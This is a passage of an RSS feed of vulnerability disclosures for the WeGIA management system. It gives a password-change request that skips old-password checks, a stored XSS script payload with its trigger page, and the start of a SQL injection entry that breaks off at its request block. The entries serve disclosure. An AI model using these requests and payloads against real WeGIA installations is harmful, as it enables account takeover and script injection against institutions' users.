&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;senha_antiga=A&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;nova_senha=wegia&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;confirmar_senha=wegia&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;nomeClasse=FuncionarioControle&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;metodo=alterarSenha&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;redir=logout.php&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;id_pessoa=1&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;alterar=Alterar
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;observations&amp;#34;&amp;gt;Observations:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Missing Password Validation: The &amp;lt;code&amp;gt;senha_antiga&amp;lt;/code&amp;gt; parameter is not validated, allowing the password to be reset without verifying the user&amp;#39;s existing password.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Change the default password wegiafrom admin user and use a random value in the field &amp;lt;code&amp;gt;senha_antiga&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57032/image.png&amp;#34;
	width=&amp;#34;993&amp;#34;
	height=&amp;#34;530&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57032/image_hu_c70c86a5189d6022.png 480w, /p/cve-2024-57032/image_hu_4e86cb192fce30bd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Login with the new password:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57032/image-1.png&amp;#34;
	width=&amp;#34;993&amp;#34;
	height=&amp;#34;528&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57032/image-1_hu_5bd7a6ceda7f220d.png 480w, /p/cve-2024-57032/image-1_hu_8f1a021e45882f76.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;188&amp;#34;
		data-flex-basis=&amp;#34;451px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;references&amp;#34;&amp;gt;References
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/issues/814&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/814&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-57033</title>
        <link>https://www.cvehunters.com/p/cve-2024-57033/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-57033/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-57033-cross-site-scripting-xss-stored-in-documentos_funcionariophp-parameter-dados_addinfo&amp;#34;&amp;gt;CVE-2024-57033: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;documentos_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;dados_addInfo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57033&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57033&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-57033-cross-site-scripting-xss-stored-in-documentos_funcionariophp-parameter-dados_addinfo&amp;#34;&amp;gt;CVE-2024-57033: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;documentos_funcionario.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;dados_addInfo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57033&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57033&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;To reproduce the issue, insert the following payloads into the vulnerable field of the URL and save the changes:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After saving the input, the injected script will be stored on the server and automatically executed for any user accessing the &amp;lt;code&amp;gt;html/geral/documentos_funcionario.php&amp;lt;/code&amp;gt;, confirming the stored XSS.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;File: &amp;lt;code&amp;gt;documentos_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Payload:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Trigger in: &amp;lt;code&amp;gt;funcionario/profile_funcionario.php?id_funcionario=1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Endpoint: &amp;lt;code&amp;gt;dados_addInfo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57033/image.png&amp;#34;
	width=&amp;#34;1274&amp;#34;
	height=&amp;#34;716&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57033/image_hu_3a215f1787b231d4.png 480w, /p/cve-2024-57033/image_hu_c7c818d4686748be.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;177&amp;#34;
		data-flex-basis=&amp;#34;427px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57033/image-1.png&amp;#34;
	width=&amp;#34;1271&amp;#34;
	height=&amp;#34;724&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57033/image-1_hu_fc162ce1ae7a847c.png 480w, /p/cve-2024-57033/image-1_hu_ca0fd0df14f6affb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;175&amp;#34;
		data-flex-basis=&amp;#34;421px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;references&amp;#34;&amp;gt;References
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/issues/816&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/816&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-57034</title>
        <link>https://www.cvehunters.com/p/cve-2024-57034/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-57034/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-57034-sql-injection-in-query_geracao_autophp&amp;#34;&amp;gt;CVE-2024-57034: SQL Injection in &amp;lt;code&amp;gt;query_geracao_auto.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57034&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57034&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the endpoint &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/query_geracao_auto.php&amp;lt;/code&amp;gt;, specifically in the &amp;lt;code&amp;gt;query&amp;lt;/code&amp;gt; parameter. This vulnerability allows the execution of arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-57034-sql-injection-in-query_geracao_autophp&amp;#34;&amp;gt;CVE-2024-57034: SQL Injection in &amp;lt;code&amp;gt;query_geracao_auto.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57034&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57034&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the endpoint &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/query_geracao_auto.php&amp;lt;/code&amp;gt;, specifically in the &amp;lt;code&amp;gt;query&amp;lt;/code&amp;gt; parameter. This vulnerability allows the execution of arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;vulnerable-request&amp;#34;&amp;gt;Vulnerable Request:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
